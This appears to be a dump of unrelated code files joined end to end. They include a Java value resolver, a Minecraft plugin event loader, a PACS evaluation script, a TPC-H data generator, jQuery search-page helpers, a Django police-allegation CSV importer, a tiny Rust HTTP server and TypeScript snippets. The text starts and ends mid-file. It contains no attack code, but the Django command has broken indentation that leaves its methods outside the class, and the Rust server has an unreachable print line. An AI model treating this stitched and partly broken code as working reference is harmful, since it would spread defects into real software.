        if (returnDefaultOnGet) result.defaultValue(defaultValue);
        if (swallowExceptions) result.swallowExceptions();
        return result;
    }

    /** execution context to use when resolving; required if resolving unsubmitted tasks or running with a time limit */
    public ValueResolver<T> context(ExecutionContext exec) {
        this.exec = exec;
        return this;
    }

    /** sets a message which will be displayed in status reports while it waits (e.g. the name of the config key being looked up) */
    public ValueResolver<T> description(String description) {
        this.description = description;
        return this;
    }

    /** sets a default value which will be returned on a call to {@link #get()} if the task does not complete
     * or completes with an error
     * <p>
     * note that {@link #getMaybe()} returns an absent object even in the presence of
     * a default, so that any error can still be accessed */
    public ValueResolver<T> defaultValue(T defaultValue) {
        this.defaultValue = defaultValue;
        this.returnDefaultOnGet = true;
        return this;
    }

    /** indicates that no default value should be returned on a call to {@link #get()}, and instead it should throw
     * (this is the default; this method is provided to undo a call to {@link #defaultValue(Object)}) */
    public ValueResolver<T> noDefaultValue() {
        this.returnDefaultOnGet = false;
        this.defaultValue = null;
        return this;
    }

    /** indicates that exceptions in resolution should not be thrown on a call to {@link #getMaybe()},
     * but rather used as part of the {@link Maybe#get()} if it's absent,
     * and swallowed altogether on a call to {@link #get()} in the presence of a {@link #defaultValue(Object)} */
    public ValueResolver<T> swallowExceptions() {
        this.swallowExceptions = true;
        return this;
    }

    public Maybe<T> getDefault() {
        if (returnDefaultOnGet) return Maybe.of(defaultValue);
        else return Maybe.absent("No default value set");
    }

    /** causes nested structures (maps, lists) to be descended and nested unresolved values resolved */
    public ValueResolver<T> deep(boolean forceDeep) {
        this.forceDeep = forceDeep;
        return this;
    }

    /** if true, forces execution of a deferred supplier to be run in a task;
     * if false, it prevents it (meaning time limits may not be applied);
     * if null, the default, it runs in a task if a time limit is applied.
     * <p>
     * running inside a task is required for some {@link DeferredSupplier}
     * instances which look up a task {@link ExecutionContext}. */
    public ValueResolver<T> embedResolutionInTask(Boolean embedResolutionInTask) {
        this.embedResolutionInTask = embedResolutionInTask;
        return this;
    }

    /** sets a time limit on executions
     * <p>
     * used for {@link Task} and {@link DeferredSupplier} instances.
     * may require an execution context at runtime. */
    public ValueResolver<T> timeout(Duration timeout) {
        this.timeout = timeout;
        return this;
    }

    protected void checkTypeNotNull() {
        if (type==null)
            throw new NullPointerException("type must be set to resolve, for '"+value+"'"+(description!=null ? ", "+description : ""));
    }

    public T get() {
        Maybe<T> m = getMaybe();
        if (m.isPresent()) return m.get();
        if (returnDefaultOnGet) return defaultValue;
        // no default: rethrows the absent's underlying exception
        return m.get();
    }

    @SuppressWarnings({ "unchecked", "rawtypes" })
    public Maybe<T> getMaybe() {
        // Single-use: a second call on the same instance is a bug (use clone()).
        if (started.getAndSet(true))
            throw new IllegalStateException("ValueResolver can only be used once");

        if (expired) return Maybe.absent("Nested resolution of "+getOriginalValue()+" did not complete within "+timeout);

        // Inherit the parent's timer if present, else start one from our timeout.
        CountdownTimer timerU = parentTimer;
        if (timerU==null && timeout!=null)
            timerU = timeout.countdownTimer();
        final CountdownTimer timer = timerU;
        if (timer!=null && !timer.isRunning())
            timer.start();

        checkTypeNotNull();
        Object v = this.value;

        //if the expected type is a closure or map and that's what we have, we're done (or if it's null);
        //but not allowed to return a future or DeferredSupplier as the resolved value
        if (v==null || (!forceDeep && type.isInstance(v) && !Future.class.isInstance(v) && !DeferredSupplier.class.isInstance(v)))
            return Maybe.of((T) v);

        try {
            //if it's a task or a future, we wait for the task to complete
            if (v instanceof TaskAdaptable<?>) {
                //if it's a task, we make sure it is submitted
                if (!((TaskAdaptable<?>) v).asTask().isSubmitted() ) {
                    // TODO could try to get exec context from Tasks.current() ... should we?
                    if (exec==null)
                        return Maybe.absent("Value for unsubmitted task '"+getDescription()+"' requested but no execution context available");
                    exec.submit(((TaskAdaptable<?>) v).asTask());
                }
            }

            if (v instanceof Future) {
                final Future<?> vfuture = (Future<?>) v;

                //including tasks, above
                if (!vfuture.isDone()) {
                    // block (reporting detail) until done or timer expiry
                    Callable<Maybe> callable = new Callable<Maybe>() {
                        public Maybe call() throws Exception {
                            return Durations.get(vfuture, timer);
                        } };
                    String description = getDescription();
                    Maybe vm = Tasks.withBlockingDetails("Waiting for "+description, callable);
                    if (vm.isAbsent()) return vm;
                    v = vm.get();
                } else {
                    v = vfuture.get();
                }
            } else if (v instanceof DeferredSupplier<?>) {
                final Object vf = v;
                Callable<Object> callable = new Callable<Object>() {
                    public Object call() throws Exception {
                        return ((DeferredSupplier<?>) vf).get();
                    } };
                // run in a task when explicitly requested or when a timeout must apply
                if (Boolean.TRUE.equals(embedResolutionInTask) || timeout!=null) {
                    if (exec==null)
                        return Maybe.absent("Embedding in task needed for '"+getDescription()+"' but no execution context available");
                    String description = getDescription();
                    Task<Object> vt = exec.submit(Tasks.<Object>builder().body(callable).name("Resolving dependent value").description(description).build());
                    Maybe<Object> vm = Durations.get(vt, timer);
                    vt.cancel(true);
                    if (vm.isAbsent()) return (Maybe<T>)vm;
                    v = vm.get();
                } else {
                    v = callable.call();
                }
            } else if (v instanceof Map) {
                //and if a map or list we look inside
                Map result = Maps.newLinkedHashMap();
                for (Map.Entry<?,?> entry : ((Map<?,?>)v).entrySet()) {
                    Maybe<?> vv = new ValueResolver(entry.getValue(), type, this)
                        .description( (description!=null ? description+", " : "") + "map entry "+entry.getKey() )
                        .getMaybe();
                    if (vv.isAbsent()) return (Maybe<T>)vv;
                    result.put(entry.getKey(), vv.get());
                }
                return Maybe.of((T) result);
            } else if (v instanceof Set) {
                Set result = Sets.newLinkedHashSet();
                int count = 0;
                for (Object it : (Set)v) {
                    Maybe<?> vv = new ValueResolver(it, type, this)
                        .description( (description!=null ? description+", " : "") + "entry "+count )
                        .getMaybe();
                    if (vv.isAbsent()) return (Maybe<T>)vv;
                    result.add(vv.get());
                    count++;
                }
                return Maybe.of((T) result);
            } else if (v instanceof Iterable) {
                List result = Lists.newArrayList();
                int count = 0;
                for (Object it : (Iterable)v) {
                    Maybe<?> vv = new ValueResolver(it, type, this)
                        .description( (description!=null ? description+", " : "") + "entry "+count )
                        .getMaybe();
                    if (vv.isAbsent()) return (Maybe<T>)vv;
                    result.add(vv.get());
                    count++;
                }
                return Maybe.of((T) result);
            } else {
                // not a wrapper type: attempt a direct coercion
                return TypeCoercions.tryCoerce(v, TypeToken.of(type));
            }

        } catch (Exception e) {
            Exceptions.propagateIfFatal(e);

            IllegalArgumentException problem = new IllegalArgumentException("Error resolving "+(description!=null ? description+", " : "")+v+", in "+exec+": "+e, e);
            if (swallowExceptions) {
                if (log.isDebugEnabled())
                    log.debug("Resolution of "+this+" failed, swallowing and returning: "+e);
                return Maybe.absent(problem);
            }
            if (log.isDebugEnabled())
                log.debug("Resolution of "+this+" failed, throwing: "+e);
            throw problem;
        }

        // the unwrapped value may itself need resolving (e.g. a task returning
        // a deferred supplier), so recurse with a nested resolver
        return new ValueResolver(v, type, this).getMaybe();
    }

    protected String getDescription() {
        return description!=null ? description : ""+value;
    }

    protected Object getOriginalValue() {
        if (parentOriginalValue!=null) return parentOriginalValue;
        return value;
    }
}
<filename>src/com/th3shadowbroker/AtMessage/Loaders/Events.java
package com.th3shadowbroker.AtMessage.Loaders;
import com.th3shadowbroker.AtMessage.Backward.WhisperMessage_1_9_2;
import com.th3shadowbroker.AtMessage.Events.AddToCache;
import com.th3shadowbroker.AtMessage.Events.RemoveFromCache;
import com.th3shadowbroker.AtMessage.Events.UpdateNotification;
import com.th3shadowbroker.AtMessage.Events.WhisperMessage;
import com.th3shadowbroker.AtMessage.Backward.WhisperMessage_1_9_4;
import com.th3shadowbroker.AtMessage.Objects.ServerVersionCheck;
import com.th3shadowbroker.AtMessage.main;
public class Events {

    /** The owning plugin, used to reach the server's plugin manager. */
    public main plugin;

    /**
     * Constructs the loader and immediately registers all event listeners.
     *
     * @param loaderClass the owning plugin instance
     */
    public Events( main loaderClass )
    {
        this.plugin = loaderClass;
        registerEvents();
    }

    /**
     * Registers the whisper-message listener matching the detected server
     * version, plus the update-notification and player-cache listeners.
     * The cache/notification listeners are registered even when the server
     * version is unknown (same behavior as before; previously the braceless
     * if made that hard to see, hence the suppressed-indentation warning).
     */
    private void registerEvents()
    {
        try {
            if ( null != ServerVersionCheck.getCurrentVersion() )
            {
                //Setup the AtMessage-Message listener
                switch (ServerVersionCheck.getCurrentVersion()) {
                    case SERVER_1_9_2:
                        plugin.getServer().getPluginManager().registerEvents( new WhisperMessage_1_9_2(this) , plugin);
                        System.out.println( plugin.ConsolePrefix + "Backward compatibility activated for 1.9.2" );
                        break;
                    case SERVER_1_9_4:
                        plugin.getServer().getPluginManager().registerEvents(new WhisperMessage_1_9_4(this) , plugin);
                        System.out.println( plugin.ConsolePrefix + "Backward compatibility activated for 1.9.4" );
                        break;
                    case SERVER_1_10_0:
                        plugin.getServer().getPluginManager().registerEvents( new WhisperMessage(this) , plugin);
                        System.out.println( plugin.ConsolePrefix + "Hey! You are up to date that's awesome !" );
                        break;
                    default:
                        break;
                }
            }
            //Send update notification if update is available
            plugin.getServer().getPluginManager().registerEvents( new UpdateNotification(this) , plugin);
            //Add joined players to cache
            plugin.getServer().getPluginManager().registerEvents( new AddToCache(this) , plugin);
            //Remove already cached players on quit
            plugin.getServer().getPluginManager().registerEvents( new RemoveFromCache(this) , plugin);
            //Send spy-messages to spectators
            //plugin.getServer().getPluginManager().registerEvents( new SendToSpectator(this) , plugin);
        } catch ( Exception ex ) {
            ex.printStackTrace();
        }
    }
}
|
# Evaluate checkpoints on the PACS benchmark on GPU 0, running test.py for
# each domain (cartoon, art_painting, sketch, photo) with both ResNet-50
# and ResNet-18 backbones, batch size 60.
# NOTE(review): -hd presumably names the held-out target domain and -dg 1
# enables the domain-generalization setting — confirm against test.py.
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd cartoon -log 10 -dg 1 -data PACS -arch resnet50 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd cartoon -log 10 -dg 1 -data PACS -arch resnet18 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd art_painting -log 10 -dg 1 -data PACS -arch resnet50 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd art_painting -log 10 -dg 1 -data PACS -arch resnet18 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd sketch -log 10 -dg 1 -data PACS -arch resnet50 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd sketch -log 10 -dg 1 -data PACS -arch resnet18 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd photo -log 10 -dg 1 -data PACS -arch resnet50 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd photo -log 10 -dg 1 -data PACS -arch resnet18 -bs 60
<filename>util/type_generator.py
import math
import random
import os
part_tbl_file = "../TPC-H/dbgen/part.tbl"
column_id = 4
part_csv_file = "../data-backup/type/part.csv"
output_file_prefix = "./type_"
inject_string = "SMALL POLISHED SILVER"
selectivity = 0.02
def extract_from_tbl():
    """Pull a single column out of the pipe-delimited TPC-H part table
    and write it to the csv file, one value per line."""
    with open(part_tbl_file, 'r') as inF:
        rows = inF.readlines()
    with open(part_csv_file, 'w') as outF:
        outF.writelines(row.split('|')[column_id] + "\n" for row in rows)
def inject_matching_string():
    """Rewrite the column file, replacing a random ``selectivity`` fraction
    of lines with ``inject_string``.

    The output keeps the original line count; the file's final newline is
    trimmed afterwards so it does not end with a trailing newline.
    """
    with open(part_csv_file, 'r') as inF:
        content = inF.readlines()
    number_of_lines = len(content)
    occurrences = int(math.ceil(number_of_lines * selectivity))
    # BUG FIX: the original sampled from range(1, number_of_lines + 1) while
    # comparing against 0-based indexes, so line 0 could never be replaced
    # and a drawn value of number_of_lines matched nothing.  A set also
    # makes the per-line membership test O(1) instead of O(occurrences).
    match_positions = set(random.sample(range(number_of_lines), occurrences))
    out_path = output_file_prefix + str(selectivity) + "_data.csv"
    with open(out_path, 'w') as outF:
        for i in range(number_of_lines):
            if i in match_positions:
                outF.write(inject_string)
                outF.write("\n")
            else:
                outF.write(content[i])
    # Drop the trailing newline so readers see exactly number_of_lines lines.
    with open(out_path, 'rb+') as outF:
        outF.seek(-1, os.SEEK_END)
        outF.truncate()

inject_matching_string()
// function gets all inputs in the search form and check if value is present
// if value is present it activates the reset button
function activateResetButton(){
    var resetBtnEle = $("#resetknet");
    var knetInputs = $(':input').filter('input,select,textarea');
    knetInputs.each(function(index,element){
        $(element).keyup(function(){
            // BUG FIX: the original only inspected the field that fired the
            // event, so emptying one field hid the reset button even while
            // other fields still held values.  Show the button if ANY of the
            // tracked inputs is non-empty.
            var hasValue = false;
            knetInputs.each(function(i, el){
                if(el.value !== ''){
                    hasValue = true;
                }
            });
            if(hasValue){
                resetBtnEle.show();
            }else{
                resetBtnEle.hide();
            }
        })
    })
}
// Switches the visible result view: fades out whichever view is currently
// shown, then (in the completion callback, so the swap is atomic) fades in
// the view named by `option`, flips the button on/off classes, and
// collapses the query-suggestor panel.
function activateButton(option){
    $('.resultViewer:visible').fadeOut(0, function () {
        $('.button_off').attr('class', 'button_on');
        $('#' + option).fadeIn();
        $('#' + option + '_button').attr('class', 'button_off');
        //Collapse Suggestor view
        $('#suggestor_search').attr('src', 'html/image/qs_expand.png');
        $('#suggestor_search_area').slideUp(500);
        //$('#suggestor_search').dialog('close');
    });
}
/*
Functions for Add, Remove or Replace terms from the query search box.
Each helper edits the query input, toggles the triggering element between
its normal and "undo" CSS classes, then refreshes the match counter and
the query suggester.
BUG FIX: `query`/`newquery` were assigned without declarations in all six
helpers, creating implicit globals shared across the whole page; they are
now proper locals.
*/
function addKeyword(keyword, from, target) {
    var query = $('#' + target).val();
    var newquery = query + ' OR ' + keyword;
    $('#' + target).val(newquery);
    $('#' + from).toggleClass('addKeywordUndo addKeyword');
    //Updates the query counter
    matchCounter();
    // Refresh the query suggester table as well by replicating its 'click' event.
    refreshQuerySuggester();
}
function addKeywordUndo(keyword, from, target) {
    var query = $('#' + target).val();
    var newquery = query.replace(' OR ' + keyword, "");
    $('#' + target).val(newquery);
    $('#' + from).toggleClass('addKeywordUndo addKeyword');
    //Updates the query counter
    matchCounter();
    // Refresh the query suggester table as well by replicating its 'click' event.
    refreshQuerySuggester();
}
function excludeKeyword(keyword, from, target) {
    var query = $('#' + target).val();
    var newquery = query + ' NOT ' + keyword;
    $('#' + target).val(newquery);
    $('#' + from).toggleClass('excludeKeywordUndo excludeKeyword');
    //Updates the query counter
    matchCounter();
    // Refresh the query suggester table as well by replicating its 'click' event.
    refreshQuerySuggester();
}
function excludeKeywordUndo(keyword, from, target) {
    var query = $('#' + target).val();
    var newquery = query.replace(' NOT ' + keyword, "");
    $('#' + target).val(newquery);
    $('#' + from).toggleClass('excludeKeywordUndo excludeKeyword');
    //Updates the query counter
    matchCounter();
    // Refresh the query suggester table as well by replicating its 'click' event.
    refreshQuerySuggester();
}
function replaceKeyword(oldkeyword, newkeyword, from, target) {
    var query = $('#' + target).val();
    var newquery = query.replace(oldkeyword, newkeyword);
    $('#' + target).val(newquery);
    $('#' + from).toggleClass('replaceKeywordUndo replaceKeyword');
    //Updates the query counter
    matchCounter();
    // Refresh the query suggester table as well by replicating its 'click' event.
    refreshQuerySuggester();
}
function replaceKeywordUndo(oldkeyword, newkeyword, from, target) {
    var query = $('#' + target).val();
    var newquery = query.replace(newkeyword, oldkeyword);
    $('#' + target).val(newquery);
    $('#' + from).toggleClass('replaceKeywordUndo replaceKeyword');
    //Updates the query counter
    matchCounter();
    // Refresh the query suggester table as well by replicating its 'click' event.
    refreshQuerySuggester();
}
// Wires the close button so users can collapse or restore the example
// queries block; the icon and the title's bottom margin track the state.
function queryToggle(){
    var queryButton = $('.close');
    // Closure flag: true while the example queries are visible.
    var isExpanded = true;
    queryButton.click(function(){
        // example queries block
        var examplequeries = $("#eg_queries");
        var exampletitle = $(".details> h3")
        // example queries block close button image
        var queryImage = queryButton.children();
        if (isExpanded) {
            // Collapse: hide the examples and show the expand icon.
            examplequeries.hide();
            queryImage.attr('src','html/image/drop-down.png');
            exampletitle.css('margin-bottom','0');
            isExpanded = false;
        } else {
            // Expand: restore the close icon and reveal the examples.
            queryImage.attr('src','html/image/close_button.png');
            examplequeries.show();
            exampletitle.css('margin-bottom','1rem');
            isExpanded = true;
        }
    });
}
/*
 * Opens the contact page in a small fixed-size (400x200) popup window
 * with browser chrome disabled.
 */
function contactWindow() {
    window.open("html/contact.html", "KnetMiner-Contact", "status=0, toolbar=0, location=0, menubar=0, height=200, width=400, resizable=0");
}
// Overlays the given element with a semi-transparent mask-loader spinner
// (see deactivateSpinner for the matching teardown).
function activateSpinner(target) {
    // maskloader animation
    $(target).maskLoader({
        // fade effect
        'fade': true,
        'z-index': '999',
        'background': '#F4F5F7',
        'opacity': '0.6',
        // position property
        'position': 'absolute',
        // custom loading spinner
        'imgLoader': false,
        // If false, you will have to run the "create" function.
        // Ex: $('body').maskLoader().create();
        'autoCreate':true,
        // displayes text alert
        'textAlert':false
    });
}
/*
 * Returns the value of the checked entry in an array-like collection of
 * radio inputs (if several are checked, the last one wins), or undefined
 * when none is checked.
 */
function getRadioValue(radio) {
    var selectedValue;
    var index = 0;
    while (index < radio.length) {
        if (radio[index].checked) {
            selectedValue = radio[index].value;
        }
        index += 1;
    }
    return selectedValue;
}
// Removes the mask-loader spinner previously added by activateSpinner.
function deactivateSpinner(target) {
    $(target).maskLoader().destroy();
}
|
import csv
import datetime
from django.core import management
from django.core.exceptions import MultipleObjectsReturned
from django.core.management.base import BaseCommand
from django.db.models import Q
from common.models import (
Officer, Allegation, PoliceWitness, Area, AllegationCategory,
OfficerAllegation)
from common.constants import FOIA_START_DATE
# 0-based column indexes into each row of the officer CSV.
OFFICER_COLS = {
    'officer_first': 2,
    'officer_last': 3,
    'gender': 4,
    'race': 6,
    'appt_date': 7,
    'star': 8,
    'rank': 9,
    'unit': 10,
    'birth_year': 11,
    'active': 12
}
# 0-based column indexes into each row of the allegation CSV.
ALLEGATION_COLS = {
    'crid': 1,
    'officer': 2,
    'cat': 3,
    'recc_finding': 6,
    'recc_outcome': 7,
    'final_finding': 8,
    'final_outcome': 9,
    'beat': 14,
    'location': 15,
    'add1': 16,
    'add2': 17,
    'city': 18,
    'incident_date': 19,
    'start_date': 20,
    'end_date': 21,
    'investigator_id': 22,
    'final_outcome_class': 23
}
# Fields that belong on OfficerAllegation rather than Allegation when the
# parsed row is split in reassign_allegations.
OFFICER_ALLEGATION_COLS = [
    'officer', 'cat', 'recc_finding', 'recc_outcome', 'final_finding',
    'final_outcome', 'final_outcome_class', 'start_date', 'end_date'
]
class Command(BaseCommand):
    help = 'Import new data in csv format'
    # Maps officer ids from the CSV (column 0) to Officer model instances;
    # populated by import_officers and consumed by reassign_allegations.
    wudi_id_mapping = {}
def add_arguments(self, parser):
    # Expects exactly three CSV paths; files[0] is the officer CSV and
    # files[1] the allegation CSV.  NOTE(review): the third file is not
    # used in the methods visible here — confirm its role.
    parser.add_argument('--files', nargs=3)
def handle(self, *args, **options):
    """Entry point: import officers, rebuild allegations, then run the
    follow-up maintenance commands."""
    # Buckets used by import_officers to report what happened to each row.
    self.rows = {
        'new': [],
        'update': [],
        'undecided': [],
    }
    self.import_officers(*args, **options)
    self.reassign_allegations(*args, **options)
    management.call_command('calculate_allegations_count')
    management.call_command('clean_officer_names')
    self.check_officer_count(*args, **options)
    # management.call_command('geocode_allegations')
def reassign_allegations(self, *args, **options):
    """Drop all Allegation rows and rebuild them from the allegation CSV.

    Document/request metadata from the existing rows is cached by crid
    beforehand and re-applied to the recreated rows.  Rows whose officer
    id is unknown are logged to not_found_allegations.csv.
    """
    # Preserve per-crid document metadata before wiping the table.
    allegation_cache = {}
    for allegation in Allegation.objects.all():
        allegation_cache[allegation.crid] = {
            'number_of_request': allegation.number_of_request,
            'document_id': allegation.document_id,
            'document_normalized_title':
                allegation.document_normalized_title,
            'document_title': allegation.document_title,
            'document_requested': allegation.document_requested,
            'document_pending': allegation.document_pending,
            'last_requested': allegation.last_requested
        }
    out = csv.writer(open('not_found_allegations.csv', 'w'))
    out.writerow([
        'id', 'crid', 'officer_id', 'cat_id', 'category',
        'allegation_name', 'recc_finding', 'recc_outcome', 'final_finding',
        'final_outcome', 'finding_edit', 'result', 'outcome_edit',
        'value', 'beat', 'location', 'add1', 'add2', 'city',
        'incident_date', 'start_date', 'end_date', 'investigator_id',
        'final_outcome_class', ''])
    Allegation.objects.all().delete()
    allegation_file = csv.reader(open(options['files'][1]))
    next(allegation_file)  # skip the header row
    counter = 0
    for row in allegation_file:
        if counter % 1000 == 0:
            print(counter)
        counter += 1
        if row[2] in self.wudi_id_mapping:
            officer = self.wudi_id_mapping[row[2]]
        else:
            officer = None
            out.writerow(row)
        crid = row[1]
        if not crid:
            continue
        # Convert each CSV cell into the value the models expect.
        kwargs = {}
        for col in ALLEGATION_COLS:
            val = row[ALLEGATION_COLS[col]]
            if val:
                if col == 'add1':
                    val = int(val) if val else None
                if col == 'beat':
                    try:
                        val = val.zfill(4)
                        val = Area.objects.get(
                            name=val, type='police-beats')
                    except Area.DoesNotExist:
                        val = None
                    except MultipleObjectsReturned:
                        val = Area.objects.filter(
                            name=val, type='police-beats').first()
                if col == 'cat':
                    try:
                        val = AllegationCategory.objects.get(cat_id=val)
                    except AllegationCategory.DoesNotExist:
                        val = None
                if col == 'officer':
                    val = officer
                if col == 'incident_date':
                    if val:
                        val = datetime.datetime.strptime(
                            val, '%Y-%m-%d %H:%M')
                    else:
                        val = '1970-01-01 00:00'
                if col in ['start_date', 'end_date']:
                    if val:
                        val = datetime.datetime.strptime(val, '%Y-%m-%d')
                    else:
                        val = None
                kwargs[col] = val
            # Empty cells are skipped entirely so model defaults apply.
        if crid in allegation_cache:
            for key in allegation_cache[crid]:
                if key == 'last_requested':
                    kwargs[key] = datetime.datetime.strftime(
                        allegation_cache[crid][key],
                        '%Y-%m-%d %H:%M:%S')
                else:
                    kwargs[key] = allegation_cache[crid][key]
        try:
            # BUG FIX: the original iterated `kwargs` directly
            # ("for k, v in kwargs"), which tries to unpack each KEY
            # string into (k, v) and raised ValueError for every row; the
            # broad except below swallowed it, so no allegations were
            # ever created.  Iterate .items() instead.
            officer_allegation_kwargs = {
                k: v for k, v in kwargs.items()
                if k in OFFICER_ALLEGATION_COLS}
            kwargs = {
                k: v for k, v in kwargs.items()
                if k not in OFFICER_ALLEGATION_COLS}
            allegation = Allegation.objects.create(**kwargs)
            officer_allegation_kwargs['allegation'] = allegation
            OfficerAllegation.objects.create(
                **officer_allegation_kwargs)
        except Exception as inst:
            print(inst, row)
    def import_officers(self, *args, **options):
        """Match officer rows from the WUDI CSV against existing Officer
        records, updating unambiguous matches and creating the rest.

        options['files'][0] is the officer CSV; options['files'][1] is the
        allegation CSV (used only to find pre-FOIA officer ids).
        Side effects: fills self.wudi_id_mapping (WUDI row id -> Officer)
        and self.rows['new']/['update'] tallies.
        """
        print('Importing officers...')
        allegation_file = csv.reader(open(options['files'][1]))
        new_prefoia_ids = self.find_new_prefoia_officer_ids(allegation_file)
        # Officer ids that already have pre-FOIA allegations in the DB.
        prefoia_ids = Allegation.objects.filter(
            incident_date__lt=FOIA_START_DATE
        ).values_list('officer_id', flat=True)
        update_queue = []
        file = csv.reader(open(options['files'][0]))
        # Hard-coded ids of rows to purge before matching — presumably
        # known-bad duplicates; TODO confirm these pks are still correct.
        Officer.objects.filter(pk__in=[9029, 9016, 8960, 8941]).delete()
        exclude_ids = []
        counter = 0
        next(file)  # skip CSV header
        for row in file:
            if counter % 1000 == 0:
                print(counter)  # progress indicator
            counter += 1
            # First pass: match by (case-insensitive) first+last name,
            # excluding officers already claimed by an earlier row.
            by_name = Officer.objects.filter(
                officer_first__iexact=row[2],
                officer_last__iexact=row[3]
            ).exclude(pk__in=exclude_ids)
            # Narrow by appointment date and/or star number when present.
            appt_date_or_star = Q()
            if row[7]:
                appt_date_or_star |= Q(appt_date__icontains=row[7])
            if row[8]:
                appt_date_or_star |= Q(star=float(row[8]))
            officers = by_name.filter(appt_date_or_star)
            if len(officers) == 0:
                self.rows['new'].append(row)
            elif len(officers) == 1:
                update_queue, exclude_ids = self.handle_update(
                    row, officers, update_queue, exclude_ids)
            else:
                # Ambiguous match: try to disambiguate with the unit name
                # (column 10), but only for rows known to be pre-FOIA.
                if not row[10] or not row[0] in new_prefoia_ids:
                    update_queue = self.handle_undecided(
                        row, officers, update_queue)
                else:
                    officers = officers.filter(
                        id__in=prefoia_ids, unit__unit_name__icontains=row[10])
                    if len(officers) == 0:
                        self.rows['new'].append(row)
                    elif len(officers) == 1:
                        update_queue, exclude_ids = self.handle_update(
                            row, officers, update_queue, exclude_ids)
                    else:
                        update_queue = self.handle_undecided(
                            row, officers, update_queue)
        print("Updating officers")
        for officers, info, row in update_queue:
            officers.update(**info)
            for officer in officers:
                self.wudi_id_mapping[row[0]] = officer
        print("Inserting new officers")
        for row in self.rows['new']:
            info = self.build_officer_info(row)
            officer = Officer.objects.create(**info)
            self.wudi_id_mapping[row[0]] = officer
        print("Done importing officers")
        for group in self.rows:
            print(group + ' officers: ' + str(len(self.rows[group])))
def find_new_prefoia_officer_ids(self, file):
ids = []
next(file)
for row in file:
if row[19] and \
datetime.datetime.strptime(
row[19].split(' ')[0], '%Y-%m-%d') < \
datetime.datetime.strptime(FOIA_START_DATE, '%Y-%m-%d'):
ids.append(row[2])
return ids
    def handle_undecided(self, row, officers, update_queue):
        """Resolve an ambiguous officer match by merging duplicates.

        Heuristic: treat the officer with the highest id as the duplicate,
        re-point its PoliceWitness rows at the survivor, delete it, and
        queue the survivor for update. If removing one row still leaves
        more than one candidate, the row is only reported for manual
        review. Returns the (possibly extended) update_queue.
        """
        # Highest id is assumed to be the later-created duplicate —
        # TODO confirm this assumption holds for the source data.
        to_delete = max([o.id for o in officers])
        to_keep = officers.exclude(id=to_delete)
        if len(to_keep) == 1:
            # Allegation re-pointing is intentionally disabled; see the
            # commented block kept below for the manual procedure.
            # Allegation.objects.filter(officer_id=to_delete)\
            # .update(officer_id=to_keep.first().id)
            PoliceWitness.objects.filter(officer_id=to_delete)\
                .update(officer_id=to_keep.first().id)
            officers.filter(id=to_delete).delete()
            update_queue.append((to_keep, self.build_officer_info(row), row))
            # solution = input('Officer ID to update or "c" to create. Delete manually in db and "s" to skip:')
            # if solution == 'c':
            # self.rows['new'].append(row)
            # elif solution != 's':
            # update = officers.filter(id=solution)
            # update_queue.append((update, self.build_officer_info(row), row))
        else:
            # Still ambiguous after excluding one candidate; flag for
            # manual inspection instead of guessing.
            print('Row %s' % row[0])
        return update_queue
    def handle_update(self, row, officers, update_queue, exclude_ids):
        """Queue a single matched officer queryset for update.

        If the matched officer is already queued by an earlier row, the
        current row is treated as a new officer instead (two CSV rows
        cannot update the same DB record). Returns the updated
        (update_queue, exclude_ids) pair; exclude_ids keeps later name
        matches from re-claiming this officer.
        """
        if officers[0].id in [x[0].id for x, y, z in update_queue]:
            self.rows['new'].append(row)
        else:
            self.rows['update'].append(row)
            update_queue.append((officers, self.build_officer_info(row), row))
            exclude_ids.append(officers.first().id)
        return update_queue, exclude_ids
def build_officer_info(self, row):
info = {}
for col in OFFICER_COLS:
if row[OFFICER_COLS[col]]:
info[col] = row[OFFICER_COLS[col]]
else:
info[col] = None
return info
def check_officer_count(self, *args, **options):
print('Comparing officers...')
mismatched = {
'less': [],
'more': [],
}
file = csv.reader(open(options['files'][2]))
next(file)
for row in file:
name = row[0].split(', ', maxsplit=1)
count = int(row[2])
officers = Officer.objects.filter(
officer_first__iexact=name[1],
officer_last__iexact=name[0]
)
if len(officers) < count:
mismatched['less'].append(row)
elif len(officers) > count:
mismatched['more'].append(row)
else:
officer = officers[0]
if row[4] != officer.allegations_count:
print('Different allegation count for %s' % officer.id)
for group in mismatched:
print(group, str(len(mismatched[group])))
print(mismatched['less'])
print(mismatched['more'])
|
use std::io::prelude::*;
use std::net::TcpListener;
use std::net::TcpStream;
/// Answer one connection with a minimal but valid HTTP/1.1 response.
///
/// The previous version wrote the bare HTML body with no status line or
/// headers (not valid HTTP) and used `write`, which may write only part
/// of the buffer; `write_all` guarantees the whole response is sent.
fn handle_connection(mut stream: TcpStream) {
    let body = "<html><body><h1>Hello World!</h1></body></html>";
    let response = format!(
        "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: {}\r\n\r\n{}",
        body.len(),
        body
    );
    stream.write_all(response.as_bytes()).unwrap();
    stream.flush().unwrap();
}
fn main() {
let listener = TcpListener::bind("127.0.0.1:8080").unwrap();
for stream in listener.incoming() {
let stream = stream.unwrap();
handle_connection(stream);
}
println!("Server successfully initiated!");
} |
import {jpBasePath} from "./_base";
// Password-reset route; `:email` and `:hash` are filled in from the
// parameters carried by the reset link.
export const jpPathResetPW = jpBasePath.appendPathSegment<{email: string, hash: string}>("/reset-pw/:email/:hash");
import * as THREE from 'three'
import { World } from './World'
export class MaterialLayer {
constructor(public id?: number, public material?: THREE.Material) {
}
static async FromJSON(world: World, json: any): Promise < MaterialLayer > {
return new Promise < MaterialLayer >(resolve => {
// "id": The layer's id in the material.
// "material": This is a definition of a Material from THREE.js, however it
// differs by the following points: Textures are loaded from the QuarkWorld passed,
// and no UUID is associated to the material.
var loader = new THREE.MaterialLoader()
loader.setTextures(<any>world.textures)
var layer = new MaterialLayer()
layer.id = json.id
layer.material = loader.parse(json.material)
resolve(layer)
})
}
} |
<reponame>GiantLuigi4/origins-architectury<gh_stars>0
package io.github.apace100.origins.registry;
import net.minecraft.entity.damage.DamageSource;
/** Custom damage sources used by Origins powers; all bypass armor and are unblockable. */
public class ModDamageSources {
    // Presumably applied when a water-breathing origin suffocates out of
    // water (name suggests gills) — TODO confirm against power code.
